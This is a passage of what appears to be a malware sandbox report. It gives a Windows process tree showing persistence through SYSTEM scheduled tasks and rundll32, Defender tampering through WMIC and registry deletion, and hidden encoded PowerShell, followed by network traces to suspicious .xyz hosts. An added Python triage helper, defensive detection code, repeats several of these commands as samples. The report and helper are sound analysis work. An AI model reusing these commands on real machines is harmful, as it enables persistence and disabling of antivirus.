                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:580
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OniiUkVuU\xpcHPg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yDlQlQjTItyRqSH" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2436
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "yDlQlQjTItyRqSH2" /F /xml "C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:548
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "yDlQlQjTItyRqSH"
                                                                                                    3⤵
                                                                                                      PID:840
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "yDlQlQjTItyRqSH"
                                                                                                      3⤵
                                                                                                        PID:1988
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "JTZgHJltaGFKim" /F /xml "C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2568
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "ebqgbGspXpXbN2" /F /xml "C:\ProgramData\RfQdYYQjhFJxkqVB\qWvhJeI.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2536
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "fKsAjLTIAPWjkpmTj2" /F /xml "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2852
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "etkoUubEiiZzrHIDvkg2" /F /xml "C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2100
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "DxfwWIkYFsDOIQKWf" /SC once /ST 04:28:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll\",#1 /wKdidbma 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1980
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "DxfwWIkYFsDOIQKWf"
                                                                                                        3⤵
                                                                                                          PID:2888
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "akamOyUwOLVWEybrw"
                                                                                                          3⤵
                                                                                                            PID:2456
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 1556
                                                                                                            3⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:2312
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 525403
                                                                                                          2⤵
                                                                                                            PID:2436
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 525403
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in System32 directory
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:1104
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "DxfwWIkYFsDOIQKWf"
                                                                                                                4⤵
                                                                                                                  PID:1772
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {46099B70-78A5-46BF-95EC-F9E2C0113173} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:596
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:580
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2360
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1700
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:3028
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2816
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:2040
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2356
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:1008
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2696
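Added example (editor's code, not part of the sandbox report): a small Python triage helper that reads the command lines from the tree above and names what each one does. The chain worth recognising is: schtasks /CREATE with /RU "SYSTEM" for a dropped EXE under C:\Windows\Temp and for a rundll32 export of a dropped DLL (/SC ONLOGON); REG DELETE of the DisableRealtimeMonitoring policy value in both the /reg:32 and /reg:64 views; forfiles /m cmd.exe /c used as an execution proxy so that cmd, then powershell, then WMIC runs a MSFT_MpPreference Remove call against the exe and wsf exclusion extensions; and a hidden powershell.EXE -EncodedCommand launched from taskeng.exe whose base64 decodes (UTF-16LE) to start-process -WindowStyle Hidden gpupdate.exe /force. The sample command lines are transcribed from the tree; the ATT&CK IDs are the editor's mapping and the helper names are assumptions, not anything the report provides.

```python
"""Triage helpers for the persistence / defence-evasion chain in the process
tree above. Added example for this page, not sandbox output: the sample command
lines are transcribed from the tree, the technique IDs are the editor's mapping."""
import base64
import re

# Constructed sample: command lines transcribed from the process tree above.
SAMPLE_CMDLINES = [
    # dropped EXE under C:\Windows\Temp, run once as SYSTEM via schtasks
    r'schtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 01:57:41 /RU "SYSTEM" '
    r'/TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe\" 0O /NqUMdidsP 525403 /S" /V1 /F',
    # dropped DLL loaded through rundll32 at every logon, as SYSTEM
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OniiUkVuU\xpcHPg.dll\",#1" '
    r'/RU "SYSTEM" /SC ONLOGON /TN "yDlQlQjTItyRqSH" /V1 /F',
    # Defender real-time protection policy value removed from the 64-bit registry view
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" '
    r'/v "DisableRealtimeMonitoring" /f /reg:64',
    # forfiles used as a proxy: forfiles -> cmd -> powershell -> WMIC on MSFT_MpPreference
    r'forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden '
    r'WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"',
    # hidden PowerShell with a base64(UTF-16LE) payload, launched by taskeng.exe
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand '
    r'cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    # benign control line from the same tree: must yield no findings
    r'gpscript.exe /RefreshSystemParam',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
_ENC_PREFIXES = '|'.join('encodedcommand'[:n] for n in range(14, 0, -1))
_ENCODED = re.compile(r'(?<!\S)-(?:%s)\s+([A-Za-z0-9+/=]+)' % _ENC_PREFIXES, re.IGNORECASE)
_TASK_ACTION = re.compile(r'/tr\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)  # honours \" escapes
_DEFENDER_POLICY = re.compile(r'\breg(?:\.exe)?\s+(add|delete)\b.*windows defender', re.IGNORECASE)
_MP_PREFERENCE = re.compile(r'msft_mppreference\s+call\s+(\w+)\s+(\S+)', re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded from base64(UTF-16LE), or None."""
    m = _ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdline):
    """Map one command line to a list of (ATT&CK technique, detail) findings."""
    low = cmdline.lower()
    findings = []

    if re.search(r'\bschtasks(?:\.exe)?\b', low) and '/create' in low:
        as_system = bool(re.search(r'/ru\s+"?system"?', low))
        m = _TASK_ACTION.search(cmdline)
        action = m.group(1).replace('\\"', '"') if m else '(action defined in /xml file)'
        findings.append(('T1053.005', 'scheduled task %s-> %s' % ('as SYSTEM ' if as_system else '', action)))
        if '\\windows\\temp\\' in action.lower():
            findings.append(('T1053.005', 'task action lives under C:\\Windows\\Temp'))
        if action.lower().startswith('rundll32'):
            findings.append(('T1218.011', 'task action proxies a dropped DLL through rundll32'))

    m = _DEFENDER_POLICY.search(cmdline)
    if m:
        findings.append(('T1562.001', 'reg.exe %s on a Windows Defender policy key' % m.group(1).upper()))

    if re.search(r'\bforfiles(?:\.exe)?\b', low) and re.search(r'\s/c\s', low):
        chain = re.findall(r'\b(forfiles|cmd|powershell|wmic)(?:\.exe)?\b', low)
        findings.append(('T1202', 'forfiles /c used as an execution proxy: ' + ' > '.join(chain)))

    m = _MP_PREFERENCE.search(cmdline)
    if m:
        findings.append(('T1562.001', 'Defender preference change via WMI: %s %s' % (m.group(1), m.group(2))))

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(('T1059.001', 'encoded PowerShell decodes to: ' + decoded))

    return findings


def summarize(cmdlines):
    """Sorted, de-duplicated technique IDs observed across a set of command lines."""
    return sorted({tech for c in cmdlines for tech, _ in triage(c)})


if __name__ == '__main__':
    for c in SAMPLE_CMDLINES:
        for tech, detail in triage(c):
            print('%-10s %s' % (tech, detail))
    print('techniques:', ', '.join(summarize(SAMPLE_CMDLINES)))
```

Two caveats when applying this to the tree above. PIDs are reused within the capture (2436, 1988, 2568 and 580 each appear twice), so the helper keys on command lines rather than on PIDs. The tasks registered with /xml (ZBTPGyo.xml, ZcASiPD.xml, qWvhJeI.xml, XkZlrsM.xml, xaXYsNF.xml) carry their actions in the XML files, which the report does not show, so for those the helper can only report that the action lives in the XML.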

                                                                                                                      Network

                                                                                                                      • DNS (US)
                                                                                                                        service-domain.xyz
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        service-domain.xyz
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        service-domain.xyz
                                                                                                                        IN A
                                                                                                                        54.210.117.250
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        c.pki.goog
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        c.pki.goog
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        c.pki.goog
                                                                                                                        IN CNAME
                                                                                                                        pki-goog.l.google.com
                                                                                                                        pki-goog.l.google.com
                                                                                                                        IN A
                                                                                                                        216.58.201.99
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://c.pki.goog/r/r1.crl
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /r/r1.crl HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: c.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                        Content-Length: 854
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: sffe
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        Date: Mon, 08 Jul 2024 04:24:42 GMT
                                                                                                                        Expires: Mon, 08 Jul 2024 05:14:42 GMT
                                                                                                                        Cache-Control: public, max-age=3000
                                                                                                                        Age: 2671
                                                                                                                        Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
                                                                                                                        Content-Type: application/pkix-crl
                                                                                                                        Vary: Accept-Encoding
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        o.pki.goog
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        o.pki.goog
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        o.pki.goog
                                                                                                                        IN CNAME
                                                                                                                        pki-goog.l.google.com
                                                                                                                        pki-goog.l.google.com
                                                                                                                        IN A
                                                                                                                        216.58.201.99
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:26:18 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 2575
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:57:36 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 698
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        216.58.201.99:80
                                                                                                                        Request
                                                                                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                        Host: o.pki.goog
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Server: ocsp_responder
                                                                                                                        Content-Length: 472
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        Date: Mon, 08 Jul 2024 04:52:40 GMT
                                                                                                                        Cache-Control: public, max-age=14400
                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                        Age: 994
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        clients2.google.com
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        clients2.google.com
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        clients2.google.com
                                                                                                                        IN CNAME
                                                                                                                        clients.l.google.com
                                                                                                                        clients.l.google.com
                                                                                                                        IN A
                                                                                                                        172.217.16.238
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        172.217.16.238:443
                                                                                                                        Request
                                                                                                                        GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM HTTP/1.1
                                                                                                                        Host: clients2.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Response
                                                                                                                        HTTP/1.1 302 Moved Temporarily
                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VPirn5WQt2DDWGCzpUrEEg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                        Date: Mon, 08 Jul 2024 05:09:14 GMT
                                                                                                                        Location: https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        Server: GSE
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Accept-Ranges: none
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                      • flag-us
                                                                                                                        DNS
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        IN CNAME
                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                        IN A
                                                                                                                        142.250.187.225
                                                                                                                      • flag-gb
                                                                                                                        GET
                                                                                                                        https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        mqcBDmi.exe
                                                                                                                        Remote address:
                                                                                                                        142.250.187.225:443
                                                                                                                        Request
                                                                                                                        GET /crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 26186
                                                                                                                        X-GUploader-UploadID: ACJd0No14a9cWpDCfJidUD--1SqA-a_1lg06-Kb2XDoudipli_3I37lAumPiv4I747-i1yWC9YA
                                                                                                                        X-Goog-Hash: crc32c=i5zIOg==
                                                                                                                        Server: UploadServer
                                                                                                                        Date: Sun, 07 Jul 2024 21:14:59 GMT
                                                                                                                        Expires: Mon, 07 Jul 2025 21:14:59 GMT
                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                        Age: 28455
                                                                                                                        Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                                        ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      • DNS
                                                                                                                        api5.check-data.xyz
                                                                                                                        rundll32.exe
                                                                                                                        Remote address:
                                                                                                                        8.8.8.8:53
                                                                                                                        Request
                                                                                                                        api5.check-data.xyz
                                                                                                                        IN A
                                                                                                                        Response
                                                                                                                        api5.check-data.xyz
                                                                                                                        IN CNAME
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        IN A
                                                                                                                        44.237.52.63
                                                                                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                        IN A
                                                                                                                        44.240.96.128
                                                                                                                      • POST
                                                                                                                        http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                                        rundll32.exe
                                                                                                                        Remote address:
                                                                                                                        44.237.52.63:80
                                                                                                                        Request
                                                                                                                        POST /api2/google_api_ifi HTTP/1.1
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                        Host: api5.check-data.xyz
                                                                                                                        Content-Length: 720
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Response
                                                                                                                        HTTP/1.1 200 OK
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-control: no-cache="set-cookie"
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Date: Mon, 08 Jul 2024 05:07:23 GMT
                                                                                                                        Server: nginx
                                                                                                                        Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: keep-alive
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        399 B
                                                                                                                        219 B
                                                                                                                        5
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        361 B
                                                                                                                        219 B
                                                                                                                        5
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        tls
                                                                                                                        mqcBDmi.exe
                                                                                                                        334 B
                                                                                                                        219 B
                                                                                                                        6
                                                                                                                        5
                                                                                                                      • 54.210.117.250:443
                                                                                                                        service-domain.xyz
                                                                                                                        mqcBDmi.exe
                                                                                                                        190 B
                                                                                                                        92 B
                                                                                                                        4
                                                                                                                        2
                                                                                                                      • 216.58.201.99:80
                                                                                                                        http://c.pki.goog/r/r1.crl
                                                                                                                        http
                                                                                                                        mqcBDmi.exe
                                                                                                                        348 B
                                                                                                                        1.7kB
                                                                                                                        5
                                                                                                                        4
                                                                                                                        HTTP Request: GET http://c.pki.goog/r/r1.crl
                                                                                                                        HTTP Response: 200
                                                                                                                      • 216.58.201.99:80
